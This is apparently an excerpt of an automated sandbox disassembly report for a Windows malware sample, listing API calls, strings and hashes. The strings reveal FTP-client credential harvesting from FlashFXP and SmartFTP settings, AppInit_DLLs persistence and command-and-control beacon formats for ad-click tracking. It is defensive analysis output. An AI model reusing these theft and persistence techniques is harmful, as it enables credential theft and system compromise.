                          • SysAllocString.OLEAUT32(eventConn), ref: 0040A18D
                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0040A1D4
                          • SetParent.USER32(00000000,00000000), ref: 0040A1E2
                          • GetWindowLongW.USER32(00000000,000000EC), ref: 0040A1ED
                          • SetWindowLongW.USER32(00000000,000000EC,00000000), ref: 0040A1FE
                          • SetWindowPos.USER32(00000000,00000001,00001388,00001388,00000010,?,00000000), ref: 0040A21E
                            • Part of subcall function 0040A0B5: CoInitialize.OLE32(00000000), ref: 0040A0C0
                            • Part of subcall function 0040A0B5: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,0040A16F,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A0CE
                            • Part of subcall function 0040A0B5: CreateWindowExW.USER32(00000000,AtlAxWin,Shell.Explorer,80000000,00000000,00000000,000004B0,00000320,00000000,00000000,00000000), ref: 0040A0F3
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Window$Long$AllocCreateFindHandleInitializeModuleParentString
                          • String ID: Shell_TrayWnd$eventConn
                          • API String ID: 2141107913-3455059086
                          • Opcode ID: 2066f8b397b36b8e779d0438fd1e5f75721f75fac11e843927efdeb34d7bad55
                          • Instruction ID: 39c15930e577ecb7297998fc23ff8408fdcdb7101606cb16b0d9d8475b405f16
                          • Opcode Fuzzy Hash: 2066f8b397b36b8e779d0438fd1e5f75721f75fac11e843927efdeb34d7bad55
                          • Instruction Fuzzy Hash: 05216834900214EFDB10AFA4CD89FAB7BB9EF0A311F2046B5F901EA2A1C7755D54CB96
                          APIs
                            • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C
                          • HeapAlloc.KERNEL32(00000008,00000626), ref: 00404888
                          • StrStrIA.SHLWAPI(?,?), ref: 00404913
                          • StrStrIA.SHLWAPI(?,?), ref: 00404925
                          • StrStrIA.SHLWAPI(?,?), ref: 00404935
                          • StrStrIA.SHLWAPI(?,?), ref: 00404947
                            • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                            • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                            • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                            • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
                            • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                            • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Find$FilePath$AllocCloseCombineFirstHeapMatchNextObjectSingleSleepSpecWait
                          • String ID: ftp://%S:%S@%S:%u$ftplist.txt
                          • API String ID: 1635188419-1322549247
                          • Opcode ID: a8df2d7964cb9d5e44167d75c5d9d1604856ea1b31e7d0b3f7357b398df4251d
                          • Instruction ID: 36c1d9bdffb8f00438c4566312b7f03f9c346fdcff82922ab75e5f9c351e1c12
                          • Opcode Fuzzy Hash: a8df2d7964cb9d5e44167d75c5d9d1604856ea1b31e7d0b3f7357b398df4251d
                          • Instruction Fuzzy Hash: 3581B0B15043819FD721EF29C840A6BBBE5AFC9304F14497EFA84A32D1E738D945CB5A
                          APIs
                          • CreateWaitableTimerW.KERNEL32(00000000,00000001,00000000), ref: 00407374
                          • GetLocalTime.KERNEL32(?), ref: 00407387
                          • GetLocalTime.KERNEL32(?), ref: 0040738D
                          • GetTimeZoneInformation.KERNEL32(?), ref: 004073C2
                          • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 00407412
                          • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 0040741C
                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,00989680,00000000), ref: 0040747A
                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00989680,00000000), ref: 00407485
                          • CloseHandle.KERNEL32(?,?,?,00989680,00000000), ref: 0040748E
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Time$FileLocalSystemTimerWaitable$CloseCreateHandleInformationObjectSingleWaitZone
                          • String ID:
                          • API String ID: 3166187867-0
                          • Opcode ID: 2667820b8e72ac86daf0972410128220eb63d60d64ca4213cefa209fb62143e0
                          • Instruction ID: 26b14636c49f8a61fb06fac8b942a3fa68f3078aba47330515a101c34858e503
                          • Opcode Fuzzy Hash: 2667820b8e72ac86daf0972410128220eb63d60d64ca4213cefa209fb62143e0
                          • Instruction Fuzzy Hash: 8B316FB2D1022DAACF04EBE5DD459EEB7BDEF44304F10406AF901B3290E7746A04DB69
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID:
                          • String ID: http$+@
                          • API String ID: 0-4127549746
                          • Opcode ID: f0dce942b3145dcad46720e365100d861664f6bcad1e9537a21da11c1cc3beb0
                          • Instruction ID: 8803294073e7eabf7739078d3f203694aecc40311bc63510a67c123621be67c8
                          • Opcode Fuzzy Hash: f0dce942b3145dcad46720e365100d861664f6bcad1e9537a21da11c1cc3beb0
                          • Instruction Fuzzy Hash: 5CA17DB1A00519DFDF00DFA5C984AAEB7B5FF89305B14486AE845FB290DB34AD41CFA4
                          APIs
                            • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004037AD
                          • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?), ref: 00403804
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: EnvironmentExpandFolderOpenPathStrings
                          • String ID: #$&$*flashfxp*$SOFTWARE\FlashFXP\3$datafolder
                          • API String ID: 1994525040-4055253781
                          • Opcode ID: b5df530147ac8d267a5cbfcc016f1ae2a019a33deaf43a82b22308bd25093abb
                          • Instruction ID: b84aa35a929ccb2802933dbb7828156d7819aaa5c632eb2dc8c8e19af11b7673
                          • Opcode Fuzzy Hash: b5df530147ac8d267a5cbfcc016f1ae2a019a33deaf43a82b22308bd25093abb
                          • Instruction Fuzzy Hash: 203130B2900118AADB10EAA5DC85DDF7BBCEB44718F10847BF605F3180EA399B458B69
                          APIs
                          • SysAllocString.OLEAUT32(?), ref: 004099EB
                          • SysAllocString.OLEAUT32(?), ref: 004099F9
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AllocString
                          • String ID: </domain>$</url>$<domain>$<url>$http://
                          • API String ID: 2525500382-924421446
                          • Opcode ID: 7723bc74f96afd5ab7d25efc8bb6f2b50cbe860e07765de9200aa53f481fba3f
                          • Instruction ID: c36137c4092f7a01c2c9ac5e3109157182881aca1e17db191de13133e2ad13bf
                          • Opcode Fuzzy Hash: 7723bc74f96afd5ab7d25efc8bb6f2b50cbe860e07765de9200aa53f481fba3f
                          • Instruction Fuzzy Hash: D521D876600218A6DB61AB59CC41BDB33E4FB44794F14407FE508B32C2EB785E4D4F99
                          APIs
                          • SysFreeString.OLEAUT32(75C0F6A0), ref: 00408F82
                          • SysFreeString.OLEAUT32(0000000B), ref: 00409046
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: FreeString
                          • String ID:
                          • API String ID: 3341692771-0
                          • Opcode ID: 59776c75d333dfe1639c07a446583e94a2c8bfe67c5695638f45226917350801
                          • Instruction ID: f0e6d8e47a3946ab2c5de92fa7688d846ddd73d58da4f3d2da06902102303575
                          • Opcode Fuzzy Hash: 59776c75d333dfe1639c07a446583e94a2c8bfe67c5695638f45226917350801
                          • Instruction Fuzzy Hash: A0616C70A0020AEFDB10DFA9DA845AEBBB2FB48304F2048BAD545F7251D7795E52DF08
                          APIs
                            • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                          • Sleep.KERNEL32(00002710,00000000,00000400,00000000), ref: 0040ACAE
                          • Sleep.KERNEL32(0000EA60), ref: 0040AD76
                          • Sleep.KERNEL32(00002710), ref: 0040ADA4
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Sleep$AttemptConnectInternet
                          • String ID: 0$^rcn=1$d$hOA$job^rev=%s^os=%s
                          • API String ID: 362191241-2593661552
                          • Opcode ID: e876ecf8844ea65909d5912cf1b13aa36029654f48e96db610e819274c2e0ff8
                          • Instruction ID: b79182b1151443badf469ae5f9ae195c128285790c89deda34db11c37ea10ffc
                          • Opcode Fuzzy Hash: e876ecf8844ea65909d5912cf1b13aa36029654f48e96db610e819274c2e0ff8
                          • Instruction Fuzzy Hash: 0531C471D00208ABCF20ABA6DC859AE77BAEF80309F10847BE505B72C1DA7849558B5B
                          APIs
                          • _ValidateScopeTableHandlers.LIBCMT ref: 0040D892
                          • __FindPESection.LIBCMT ref: 0040D8AC
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: FindHandlersScopeSectionTableValidate
                          • String ID:
                          • API String ID: 876702719-0
                          • Opcode ID: dad01fb9bdadffb69ef4f48bfe6dd386f460ef773ad6b00c79be1d47ae49c001
                          • Instruction ID: 4070355c3de93ac57746f54d9fb9ba92a54bad1974282013f33c457a7dad05b0
                          • Opcode Fuzzy Hash: dad01fb9bdadffb69ef4f48bfe6dd386f460ef773ad6b00c79be1d47ae49c001
                          • Instruction Fuzzy Hash: 96A1C172F042158BCB24CF98D981B6E77B1EB84314F56813AD815A73D0DB39AC49CB9D
                          APIs
                          • SysFreeString.OLEAUT32(?), ref: 004088E4
                          • SysFreeString.OLEAUT32(?), ref: 004088E9
                          • SysFreeString.OLEAUT32(?), ref: 004089D3
                          • SysFreeString.OLEAUT32(?), ref: 004089D8
                          • SysFreeString.OLEAUT32(?), ref: 004089F3
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: FreeString
                          • String ID: +@
                          • API String ID: 3341692771-3835504741
                          • Opcode ID: 93f0afddb38b81210f93c4942281d01229e6bb84a740b12f8f50e9dc1a7fc491
                          • Instruction ID: a3ddab01b40b0bc50fc9c7e4bf61c95a679aea40eaf3a0ce7d8bcb6f132c7745
                          • Opcode Fuzzy Hash: 93f0afddb38b81210f93c4942281d01229e6bb84a740b12f8f50e9dc1a7fc491
                          • Instruction Fuzzy Hash: BB518171900219AFDF05BFA1CC45AEF7BB8EF08308F00447AF855B6192EB799A51CB59
                          APIs
                          • Sleep.KERNEL32(00002710,00000000,00000000,00000000), ref: 0040A7A3
                          • Sleep.KERNEL32(0000EA60,?,00000000,00000000,00000000), ref: 0040A899
                          • Sleep.KERNEL32(00002710,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8CC
                          • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8E5
                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8EC
                            • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Sleep$Heap$AttemptConnectFreeInternetProcess
                          • String ID: 0$confirm^rev=%s^code=%s^param=%s^os=%s
                          • API String ID: 3100629401-2436734164
                          • Opcode ID: 9652d423a98df953dd9117dceebf08b302c82fbb0c377fe7acd8f7bbba186267
                          • Instruction ID: 7defdabbc875a2827947a9af70fbac2689cb4d570e6f2fffa55db425585f7fd8
                          • Opcode Fuzzy Hash: 9652d423a98df953dd9117dceebf08b302c82fbb0c377fe7acd8f7bbba186267
                          • Instruction Fuzzy Hash: C0418372D00618AACB11EBE1DC859DF73BCEF44304F10847BF505B6181EA789A558F9E
                          APIs
                          • Sleep.KERNEL32(00002710,00420840,00001000,00000000,?,0040B2BB,00000000,00000000,00000000,00000001,00000000,00000000), ref: 00402566
                          • DeleteFileW.KERNEL32(00000000,00420840,00001000,00000000,?,0040B2BB,00000000,00000000,00000000,00000001,00000000,00000000), ref: 00402587
                          • Sleep.KERNEL32(0000EA60,00000000,00000001,00000000,00000000), ref: 004025B3
                            • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                          • _memset.LIBCMT ref: 004025DA
                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00420840,?,?,?,?,?,00000000,00000001,00000000), ref: 0040264D
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Sleep$AttemptConnectCreateDeleteFileInternetProcess_memset
                          • String ID: none
                          • API String ID: 2353737338-2140143823
                          • Opcode ID: a9610d18699f1113e4a22a1a7ed1018a06f4e5a4b53e05e94114c749c06fc169
                          • Instruction ID: 23ab6f573089ca27c74aa918c09813edc931bf25471b74fd790eff350109b64e
                          • Opcode Fuzzy Hash: a9610d18699f1113e4a22a1a7ed1018a06f4e5a4b53e05e94114c749c06fc169
                          • Instruction Fuzzy Hash: 8D319231A00219ABCB21EF61DE49AEF7769FF04748F00043BF905B21C1D6789A51CBAE
                          APIs
                          • SysFreeString.OLEAUT32(?), ref: 004094E6
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: FreeString
                          • String ID:
                          • API String ID: 3341692771-0
                          • Opcode ID: 99a964074df9a43e7876bfa78059f63c2205d652b6a4e0ea0b2e4f8e9ecac31d
                          • Instruction ID: b8745a711dcf8da59f3798694fa3079dcf63c40c9cdbadd59c4d39193402e254
                          • Opcode Fuzzy Hash: 99a964074df9a43e7876bfa78059f63c2205d652b6a4e0ea0b2e4f8e9ecac31d
                          • Instruction Fuzzy Hash: C9214832A00108BBDB01DFAADC44B9E7BB8EF48345F1484B6E805F71A1D774AE41DB84
                          APIs
                          • _memset.LIBCMT ref: 0040A26B
                          • SysAllocString.OLEAUT32(?), ref: 0040A28E
                          • SysAllocString.OLEAUT32(?), ref: 0040A296
                          • SysFreeString.OLEAUT32(00000000), ref: 0040A2CA
                          • SysFreeString.OLEAUT32(?), ref: 0040A2CF
                            • Part of subcall function 00409FB1: GetTickCount.KERNEL32 ref: 00409FCE
                            • Part of subcall function 00409FB1: GetTickCount.KERNEL32 ref: 00409FDE
                            • Part of subcall function 00409FB1: Sleep.KERNEL32(00000064,?,?,0040A442,?,?), ref: 00409FEC
                            • Part of subcall function 00409FB1: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409FFB
                            • Part of subcall function 00409FB1: DispatchMessageW.USER32(?), ref: 0040A009
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: String$AllocCountFreeMessageTick$DispatchPeekSleep_memset
                          • String ID: J(@
                          • API String ID: 3143865713-2848800318
                          • Opcode ID: 68495801366515c75ff4f7091ec1779cfaae467043e456767ef3efc9e03748a3
                          • Instruction ID: bfa1c3e5fdaec5be4dfb18607c12502589e7fd5433bac8caf4aacda455aa0499
                          • Opcode Fuzzy Hash: 68495801366515c75ff4f7091ec1779cfaae467043e456767ef3efc9e03748a3
                          • Instruction Fuzzy Hash: 3A118F72D10219ABCB00DFA9DD448DEBBB9FF08354B11456AF415B7290E770AE14CFA4
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000000,UniqueNum), ref: 0040784D
                          • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00407864
                          • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00407879
                          • CloseHandle.KERNEL32(00000000), ref: 00407880
                          • GetTickCount.KERNEL32 ref: 00407888
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$CloseCountCreateHandleModuleNameTickTime
                          • String ID: UniqueNum
                          • API String ID: 1853814767-3816303966
                          • Opcode ID: e7107705f7d645ec0444386ddfffd8695f1bbe122d048c6309b931cdd7db22a5
                          • Instruction ID: 2f8cc66c71eb5b32faf52737d8a911681d4da4e376004c23895cdbe2f04b10ac
                          • Opcode Fuzzy Hash: e7107705f7d645ec0444386ddfffd8695f1bbe122d048c6309b931cdd7db22a5
                          • Instruction Fuzzy Hash: AE110633419220ABD210AB65EC4CA9B7FACEF45760F004A3AF964E21D0D6349211C7AB
                          APIs
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,UniqueNum), ref: 00407E5C
                          • ReadFile.KERNEL32(?,00000064,00000001,00000000), ref: 00407E74
                            • Part of subcall function 00407CD7: GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                            • Part of subcall function 00407CD7: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$CreateModuleNamePointerRead
                          • String ID: UniqueNum$d$hOAd$x
                          • API String ID: 1528952607-1018652783
                          • Opcode ID: 015ecc0cc43ae81723c1e035d0cdbf130f909c8143b489dc0bfa89a80df37f55
                          • Instruction ID: 0df55d11f519ebf6f0451cc58b4543fb7278309a9039aac926228ebb90f40a66
                          • Opcode Fuzzy Hash: 015ecc0cc43ae81723c1e035d0cdbf130f909c8143b489dc0bfa89a80df37f55
                          • Instruction Fuzzy Hash: 5311A531D09308AADF109B61DD05BDB3B6AAB00324F218676E612F61E0E7749D44CBAE
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion\Windows,00000000,00000001,?,?,00000000), ref: 00408628
                          • GetLastError.KERNEL32(?,00000000), ref: 0040864A
                            • Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                            • Part of subcall function 004069C0: RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                          • DeleteFileW.KERNEL32(C:\WINDOWS\system32\gbdwpbm.dll,?,00000000), ref: 00408687
                            • Part of subcall function 004069FD: RegCreateKeyExW.ADVAPI32(0040EA48,00000000,00000000,00000000,00000000,00020006,00000000,00000002,0040EA48,?,?,?,?,00406AD3,80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current), ref: 00406A22
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CloseCreateDeleteErrorFileLastOpenQueryValue
                          • String ID: AppInit_DLLs$C:\WINDOWS\system32\gbdwpbm.dll$Software\Microsoft\Windows NT\CurrentVersion\Windows
                          • API String ID: 4026185228-3265104503
                          • Opcode ID: b4fb547f36a341d56e63cd8c3141924342823e6c0e28cdd89059e7ce4998d0d2
                          • Instruction ID: 1689b80d2e7b4165945397198c320d7ed833f5e108bfbebac4dfc06446509e60
                          • Opcode Fuzzy Hash: b4fb547f36a341d56e63cd8c3141924342823e6c0e28cdd89059e7ce4998d0d2
                          • Instruction Fuzzy Hash: 99014CB2A44124B6E62067665E06F9B72AC9B00750F220D7BF905F31C0DABA9D1446AD
                          APIs
                          • SysAllocString.OLEAUT32(?), ref: 00409B00
                          • SysAllocString.OLEAUT32(?), ref: 00409B0E
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AllocString
                          • String ID: </title>$</url>$<title>$<url>
                          • API String ID: 2525500382-2286408829
                          • Opcode ID: accc4c2b32817054c02e480ca82d26facf4490b578c9b74d600f9b3addd9539d
                          • Instruction ID: e94fff7a9c4556839c155ffec7726d55edf757161a42396596b5093e86978141
                          • Opcode Fuzzy Hash: accc4c2b32817054c02e480ca82d26facf4490b578c9b74d600f9b3addd9539d
                          • Instruction Fuzzy Hash: 4F01DB7564021CA7DB116A55CC41FD637A8BB44799F044077FA04F32C3E978AA0C4BA4
                          APIs
                            • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                          • Sleep.KERNEL32(00002710,?,?,?,?,00402C8F,00000032,00000000,00000000,00000000,00000000,?), ref: 0040A91C
                          • Sleep.KERNEL32(00002710), ref: 0040AAC1
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040AAE9
                          • HeapFree.KERNEL32(00000000), ref: 0040AAF0
                          Strings
                          • 0, xrefs: 0040AA5B
                          • jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s, xrefs: 0040A957
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: HeapSleep$AttemptConnectFreeInternetProcess
                          • String ID: 0$jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s
                          • API String ID: 3713053250-1268808612
                          • Opcode ID: 27a49e9b0a243f6ea4d036eb24575c3a25ef3ed8582b626cf885f00009b11edd
                          • Instruction ID: cb73c9a78e41fc00613c6eff30345c36a412e41c8c720ed22b53be089701fd16
                          • Opcode Fuzzy Hash: 27a49e9b0a243f6ea4d036eb24575c3a25ef3ed8582b626cf885f00009b11edd
                          • Instruction Fuzzy Hash: 88515072A00218A6CF10EB95DC959DF737DEF44308F40447BF406B7281EB789A958FAA
                          APIs
                          • GetLocalTime.KERNEL32(?,?), ref: 004074AD
                          • GetLocalTime.KERNEL32(00000000), ref: 004074B3
                          • GetTimeZoneInformation.KERNEL32(?), ref: 004074EA
                          • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 00407525
                          • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 0040752F
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040754A
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Time$FileLocalSystem$InformationUnothrow_t@std@@@Zone__ehfuncinfo$??2@
                          • String ID:
                          • API String ID: 3777474486-0
                          • Opcode ID: dc75d57b0fd5e0fdd9494c9f665b53f3e55cd7f2b0e9017e93342081d6970c63
                          • Instruction ID: c9ff0a62426275c5a0d4f0aa0fa2549fa158b312224671bef63f429b7f92df75
                          • Opcode Fuzzy Hash: dc75d57b0fd5e0fdd9494c9f665b53f3e55cd7f2b0e9017e93342081d6970c63
                          • Instruction Fuzzy Hash: 03112C72D1022DAADF00EBD4DC44AEEB7FCBF48314F04445AE901B7240E7B9A608CBA5
                          APIs
                          • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 004083DC
                          • GetFileSizeEx.KERNEL32(00000000,?), ref: 004083EF
                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00408417
                          • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 0040842F
                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00408449
                          • CloseHandle.KERNEL32(?), ref: 00408452
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$Virtual$AllocCloseCreateFreeHandleReadSize
                          • String ID:
                          • API String ID: 1974014688-0
                          • Opcode ID: c2b876117cf5bdd4c26ea99d0d1f22b8a7b68d93f1e59a17f5f06edaaf93f8ba
                          • Instruction ID: 01d1f8b5f38b633e5055412454defe488cd8fa266e80ff04f0611ceb3180ae32
                          • Opcode Fuzzy Hash: c2b876117cf5bdd4c26ea99d0d1f22b8a7b68d93f1e59a17f5f06edaaf93f8ba
                          • Instruction Fuzzy Hash: 47115170500201FBEB305F56CE49E5BBBB9EB90700F10892DF596F21E0EB74A951DB28
                          APIs
                          • InternetConnectW.WININET(?,00000050,00000000,00000000,00000003,00000000,00000000,?), ref: 00409EA3
                          • HttpOpenRequestW.WININET(00000000,POST,04400100,00000000,00000000,00000000,04400100,00000000), ref: 00409EC3
                          • HttpSendRequestW.WININET(00000000,00000000,00000000,?,?), ref: 00409EDA
                          • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00409F00
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: HttpInternetRequest$ConnectFileOpenReadSend
                          • String ID: POST
                          • API String ID: 961146071-1814004025
                          • Opcode ID: 20f9c5eacef7b48b8181bad7e01822bf71c4addd269446e4957b1a187c5c6ded
                          • Instruction ID: 440a75f1c6cd1a7483e62584c22426b42aa3ce760e55699d8a89a0e8c7b72afb
                          • Opcode Fuzzy Hash: 20f9c5eacef7b48b8181bad7e01822bf71c4addd269446e4957b1a187c5c6ded
                          • Instruction Fuzzy Hash: B8318E71900119BFDB10DBA4DC84EFE7679EB54349F14087AFA41B62C2D6385E448BA8
                          APIs
                            • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,?,00000008), ref: 004051EB
                          Strings
                          • personal favorites, xrefs: 00405176
                          • folder, xrefs: 00405184
                          • SOFTWARE\smartftp\client 2.0\settings\backup, xrefs: 00405168
                          • SOFTWARE\smartftp\client 2.0\settings\general\favorites, xrefs: 00405157
                          Memory Dump Source
